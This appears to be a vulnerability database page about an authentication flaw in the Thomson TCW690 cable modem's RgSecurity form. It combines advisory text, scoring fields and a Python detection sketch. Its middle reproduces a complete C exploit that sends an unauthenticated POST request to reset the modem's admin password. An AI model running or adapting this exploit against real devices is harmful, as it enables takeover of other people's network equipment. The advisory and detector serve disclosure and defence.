Published: 2005-02-21 00:00:00
Revised: 2016-10-17 23:12:04

[Original text] The RgSecurity form in the HTTP server for the Thomson TCW690 cable modem running firmware 2.1 and software ST42.03.0a does not properly validate the password before performing changes, which allows remote attackers on the LAN to gain access via a direct POST request.

[CNNVD] Thomson cable modem RgSecurity form validation remote attack vulnerability (CNNVD-200502-073)

        The Thomson TCW690 cable modem is a cable modem.
        The RgSecurity form in the HTTP server of the Thomson TCW690 cable modem running firmware 2.1 and software ST42.03.0a does not perform proper validation before changing the password, which allows remote attackers on the LAN to gain access via a direct POST request.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20050219 Thomson TCW690 POST Password Validation Vulnerability
(UNKNOWN)  XF  thomson-tcw690-gain-access(19387)

- Vulnerability information

Thomson cable modem RgSecurity form validation remote attack vulnerability
High risk Unknown
2005-02-21 00:00:00 2005-10-20 00:00:00

- Advisories and patches


- Vulnerability information (829)

Thomson TCW690 POST Password Validation Exploit (EDBID:829)
hardware remote
2005-02-19 Verified
80 MurDoK
N/A
/*
 *     Thomson TCW690 POST Password Validation exploit
 *  Tested with hardware version 2.1 and software version ST42.03.0a
 *  Bug found by: MurDoK <murdok.lnx at>
 *  Date: 02.19.2005
 *
 *	sh-3.00$ gcc mdk_tcw690.c -o tcw690
 *	sh-3.00$ ./tcw690 123
 *	*****************************************
 *	Thomson TCW690 POST Password Validation
 *	Change password exploit coded by MurDoK
 *	*****************************************
 *	[1] Connecting...
 *	[2] Sending POST request...
 *	[3] Done! go to
 *	sh-3.00$
 *
 * fuck AUNA :/
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;

/* Request headers; the form body is appended in main(). */
char badcode[1000] =
"POST /goform/RgSecurity HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"	/* no credentials are supplied */
"Content-Length: 62\r\n"
"\r\n";	/* blank line ends the header block */

int main(int argc, char *argv[]) {
//	system("clear");
	printf(" Thomson TCW690 POST Password Validation\n");
	printf(" Change password exploit coded by MurDoK\n");
	if(argc<3) {
		printf("Usage: %s <router IP> <new_password>\n\n", argv[0]);
		return 0;
	}
	fd = socket(AF_INET, SOCK_STREAM, 0);
	he = gethostbyname(argv[1]);
	memset((char *) &sock, 0, sizeof(sock));
	sock.sin_family = AF_INET;
	sock.sin_port = htons(80);	/* HTTP server port, 80 as listed in the record above */
	sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);
	printf("[1] Connecting... \n");
	if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
		printf("ERROR: Can't connect to host!\n");
		return 0;
	}
	/* Form body: new password, its confirmation, and the factory-restore flag. */
	strcat(badcode, "Password=");
	strcat(badcode, argv[2]);
	strcat(badcode, "&PasswordReEnter=");
	strcat(badcode, argv[2]);
	strcat(badcode, "&RestoreFactoryNo=0x00");
	printf("[2] Sending POST request...\n");
	write(fd, badcode, strlen(badcode));

	printf("[3] Done! go to http://%s\n", argv[1]);
	return 1;
}

// [2005-02-19]

- Vulnerability information

Thomson TCW690 Cable Modem RgSecurity.asp POST Request Admin Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

The Thomson TCW690 Cable Modem contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially-crafted POST request is sent to the cable modem HTTP server's RgSecurity.asp form. This flaw may lead to a loss of integrity.
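
A detection sketch for the request pattern described above, added here as an example and not part of the original record or of any vendor tooling: it flags POSTs to /goform/RgSecurity whose Authorization header carries no usable Basic credentials. The function names are hypothetical, the sample requests are constructed, and it assumes a monitoring point that sees cleartext HTTP sent to the modem.

```python
import base64

# Form handler named in this record's request.
TARGET_PATH = "/goform/RgSecurity"

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = (lines[0].split(" ", 2) + ["", ""])[:3]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def basic_credentials(headers):
    """Return (user, password) from a Basic Authorization header, else None."""
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None  # header absent, wrong scheme, or "Basic" with no token
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("latin-1")
    except ValueError:
        return None  # token is not valid base64
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def is_suspicious(raw):
    """Flag POSTs to the RgSecurity handler that carry no usable credentials."""
    method, path, headers, _ = parse_request(raw)
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return False
    return basic_credentials(headers) is None

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "no-credentials": b"POST /goform/RgSecurity HTTP/1.1\r\nAuthorization: Basic\r\n\r\n"
                      b"Password=x&PasswordReEnter=x&RestoreFactoryNo=0x00",
    "with-credentials": b"POST /goform/RgSecurity HTTP/1.1\r\nAuthorization: Basic "
                        + base64.b64encode(b"admin:example") + b"\r\n\r\nPassword=y",
    "other-page": b"GET /RgSecurity.asp HTTP/1.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, "ALERT" if is_suspicious(raw) else "ok")
```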

- Timeline

2005-02-19 2005-02-06
2005-02-19 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author